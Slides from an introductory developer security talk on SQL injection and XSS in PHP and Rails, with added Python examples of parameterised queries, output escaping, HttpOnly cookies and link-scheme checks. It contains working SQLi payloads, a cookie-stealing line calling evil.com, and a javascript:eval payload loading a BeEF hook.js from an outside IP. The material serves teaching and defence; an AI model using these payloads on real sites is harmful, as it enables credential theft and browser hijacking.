Don’t Do what Derpy The Dreadful Dev Does
(also - don’t let “friends” on IRC decide on your talk title)
Secure Development Melbourne, 11/06/2015
whoami
• @liamosaur
• Penetration Tester / Consultant with Assurance
• Previously: C# / Java developer
The Brief
• Basic, introductory level talk about security
• Establish some common ground between the Infosec and Dev world
Topics
• Popular vulnerabilities (hopefully a recap)
• Demo some tools by exploiting some vulns
OWASP Top 5/10
1. Injection (SQLi, Command injection, XXE, LDAPi etc)
2. Broken Auth / Session Management
3. Cross-Site Scripting (XSS)
4. Insecure Direct Object References
5. Security Misconfiguration
SQLi basics
• Inject user controlled content into dynamic SQL queries, allowing unintended access/control of the database
SQLi basics
• PHP: $query = "SELECT username FROM users WHERE username='" . $_POST['username'] . "'";
• Input: liamo
• SQL: SELECT username FROM users WHERE username='liamo'
• Query result: liamo
SQLi basics
• PHP: $query = "SELECT username FROM users WHERE username='" . $_POST['username'] . "'";
• Input: ' OR 'a'='a
• SQL: SELECT username FROM users WHERE username='' OR 'a'='a'
• Query result: list of all users
SQLi basics
• PHP: $query = "SELECT username FROM users WHERE username='" . $_POST['username'] . "'";
• Input: liamo' UNION SELECT password FROM users WHERE username='admin
• SQL: SELECT username FROM users WHERE username='liamo' UNION SELECT password FROM users WHERE username='admin'
• Query result: liamo and the admin password
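The three SQLi slides above, run for real against a throwaway database. This is an added example, not code from the talk: it uses Python with the standard-library sqlite3 module as a runnable stand-in for the PHP on the slides, and the users table and its passwords are constructed sample data (the admin password is a placeholder). lookup_unsafe builds the query by string concatenation exactly as the PHP does; lookup_safe hands the same input to the driver as a bound parameter, which is the fix the talk's ActiveRecord "magic beans" rely on.

```python
import sqlite3


def make_db():
    """In-memory SQLite database with a constructed users table (sample data)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?)",
        [("liamo", "liamo-pw"), ("admin", "ADMIN-PW-PLACEHOLDER"), ("bob", "bob-pw")],
    )
    return conn


def lookup_unsafe(conn, username):
    """The slides' PHP pattern: user input concatenated straight into the SQL text."""
    query = "SELECT username FROM users WHERE username='" + username + "'"
    return [row[0] for row in conn.execute(query)]


def lookup_safe(conn, username):
    """Parameterised query: the driver binds the value, so it can never become SQL."""
    query = "SELECT username FROM users WHERE username=?"
    return [row[0] for row in conn.execute(query, (username,))]


if __name__ == "__main__":
    conn = make_db()
    for payload in (
        "liamo",
        "' OR 'a'='a",
        "liamo' UNION SELECT password FROM users WHERE username='admin",
    ):
        print(repr(payload))
        print("  unsafe:", lookup_unsafe(conn, payload))   # one row, all rows, admin password
        print("  safe:  ", lookup_safe(conn, payload))     # one row, nothing, nothing
```

With the bound parameter the quote in the input is just a character inside the username being compared, so the second and third payloads match no row at all; there is no escaping step to get wrong.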
Cross-Site Scripting (XSS)
• Inject user controlled content into dynamic web content, allowing unintended access/control within a target browser
XSS Basics
• HTML: <html><body>Hello, <?php echo $_REQUEST['name']; ?>!</body></html>
• Input: Liam
• Output: Hello, Liam!
XSS Basics
• HTML: <html><body>Hello, <?php echo $_REQUEST['name']; ?>!</body></html>
• Input: Liam<script>alert(1)</script>
• Output:
XSS - Who cares?
• Old school - cookie stealing
• http://evil.com/cookies.php?+escape(document.cookie)
• Steal session ID - game over
• Less effective thanks to httpOnly cookie flag
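The two XSS slides and the httpOnly point, as one added example that is not part of the talk. Python stands in for the PHP page: greet_unsafe echoes the request parameter into the markup as the slide does, greet_safe HTML-escapes it first, and session_cookie_header builds the Set-Cookie line with the HttpOnly flag that keeps the session ID out of document.cookie. The cookie name, the session value and the helper names are assumptions chosen for the example.

```python
import html
from http.cookies import SimpleCookie

PAGE = "<html><body>Hello, {}!</body></html>"


def greet_unsafe(name):
    """The slides' PHP pattern: the request parameter is echoed into HTML as-is."""
    return PAGE.format(name)


def greet_safe(name):
    """Same page, but the parameter is HTML-escaped before it reaches the markup.
    quote=True also escapes quotes, so the value is safe inside attributes too."""
    return PAGE.format(html.escape(name, quote=True))


def session_cookie_header(session_id):
    """Set-Cookie header for a session ID that script in the page cannot read.
    Cookie name 'session' is an assumption for the example."""
    cookie = SimpleCookie()
    cookie["session"] = session_id
    cookie["session"]["httponly"] = True   # document.cookie no longer exposes it
    cookie["session"]["secure"] = True     # only sent over HTTPS
    cookie["session"]["path"] = "/"
    return cookie.output(header="Set-Cookie:")


def cookie_is_script_readable(set_cookie_header):
    """Check an outgoing Set-Cookie header: True if the HttpOnly flag is missing,
    i.e. an XSS payload could read this cookie via document.cookie."""
    attrs = [part.strip().lower() for part in set_cookie_header.split(";")[1:]]
    return "httponly" not in attrs


if __name__ == "__main__":
    payload = "Liam<script>alert(1)</script>"
    print(greet_unsafe(payload))   # script tag lands in the page verbatim
    print(greet_safe(payload))     # &lt;script&gt; is rendered as text, not run
    header = session_cookie_header("abc123")
    print(header)
    print("readable by script:", cookie_is_script_readable(header))
```

Escaping on output stops the injected markup from being parsed as HTML; HttpOnly limits the damage if an escape is missed somewhere, which is why the slide calls cookie theft "less effective" rather than impossible: the script still runs with the user's session, it just cannot copy the cookie out.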
“Nobody uses PHP anymore Liam, all the cool kids use Ruby on Rails now”
PHP Demo!
Rails
• Problem #1 - I don’t know Rails
• Solution: Learn Rails! (this is definitely a worthwhile proposition for a “10-20 minute talk”)
Rails
• Learned Rails. Wrote a basic app
• Problem #2: Rails has ActiveRecord magic beans that prevent SQLi
Rails
• Solution: Uhh.. maybe I’ll just demo XSS instead!
Rails
• Problem #3: Rails has input/output escaping magic beans that prevent XSS
• Solution: Declare webapp security solved, retire from pentesting, write Rails app, move to SF, get VC, found startup, sell to Google/Apple, make fat stacks, retire
Rubby Demo!
Presenting: Rubby
Presenting: Rubby
• Bad code
• Better code
Exploiting Rubby
Rubby XSS
• “link_to” is vulnerable to XSS out of the box if it displays user controlled content
Rubby XSS
• Challenge for those playing at home: come up with a shorter, more elegant way of injecting a link to hook.js into a Rails link_to than this monstrosity:
javascript:eval("function x(){var a = document.createElement('script');a.setAttribute('src','http://192.168.57.159:3000/hook.js');document.head.appendChild(a);};x();");
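Why the link_to slide works despite Rails escaping: HTML escaping protects the link text and the quotes around the attribute, but a javascript: URL contains nothing that escaping touches, so the browser is handed a script URL intact. The check a link helper needs is an allowlist of URL schemes applied before the value goes anywhere near the href. The following is an added example, not the talk's code and not Rails' link_to; it is written in Python so it runs here, and it goes a little beyond the slide's payload by also normalising the case and embedded-whitespace variants that browsers accept, so the decision is made on the scheme rather than on a blocklist of spellings. The allowed scheme set and the helper names are assumptions for the example.

```python
import html
from urllib.parse import urlsplit

# Schemes a user-supplied link may carry (assumption: what this app needs).
ALLOWED_SCHEMES = {"http", "https", "mailto"}


def safe_href(url):
    """Return the URL if it is safe to place in an href, otherwise None.

    Browsers drop tabs and newlines inside a URL and match the scheme
    case-insensitively, so the input is normalised the same way before the
    allowlist check; a scheme-less value must be a site-relative path.
    """
    cleaned = "".join(ch for ch in url if ch not in "\t\r\n").strip()
    parts = urlsplit(cleaned)
    scheme = parts.scheme.lower()
    if scheme:
        return cleaned if scheme in ALLOWED_SCHEMES else None
    if parts.netloc:            # protocol-relative //host/... is still off-site
        return None
    return cleaned              # site-relative path such as /users/1


def render_link(text, url):
    """Build an <a> tag the way a link helper should: escape the text and the
    attribute value, and replace a disallowed href instead of emitting it."""
    href = safe_href(url)
    if href is None:
        href = "#"
    return '<a href="{}">{}</a>'.format(
        html.escape(href, quote=True), html.escape(text, quote=True)
    )


if __name__ == "__main__":
    for candidate in (
        "https://example.com/",
        "/users/1",
        'javascript:eval("x()")',      # the slide's payload, shortened
        " JavaScript:alert(1)",
        "java\tscript:alert(1)",
        "//evil.example/",
    ):
        print(repr(candidate), "->", render_link("profile", candidate))
```

Note that the check is on the parsed scheme, not on the string "javascript:" appearing somewhere in the value: that is what lets the whitespace and case variants fall into the same bucket as the plain payload.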
BeEF Tunnelling Proxy (diagram)
Attacker's browser → BeEF server (HTTP proxy) → hook.js in the victim's browser (XHR proxy) → target server (same domain as the XSS phish). The victim is phished with XSS so that their browser loads hook.js.
Frameworks/Languages
• PHP
  • Bad: No built in security
• Ruby on Rails
  • Good: Built in security
Frameworks/Languages
• PHP
  • Good: PHP devs know they need to take security into account
• Ruby on Rails
  • Bad: “The framework takes care of security for me!”
Conclusions
• Security is everyone’s responsibility
• Your framework’s magic beans won’t save you
Questions - save for the Q&A Panel!
References
• https://www.owasp.org/index.php/Top_10_2013-Top_10
• http://rails-sqli.org/
• https://www.owasp.org/index.php/Ruby_on_Rails_Cheatsheet
• https://github.com/beefproject/beef/wiki/Tunneling
• http://sqlmap.org/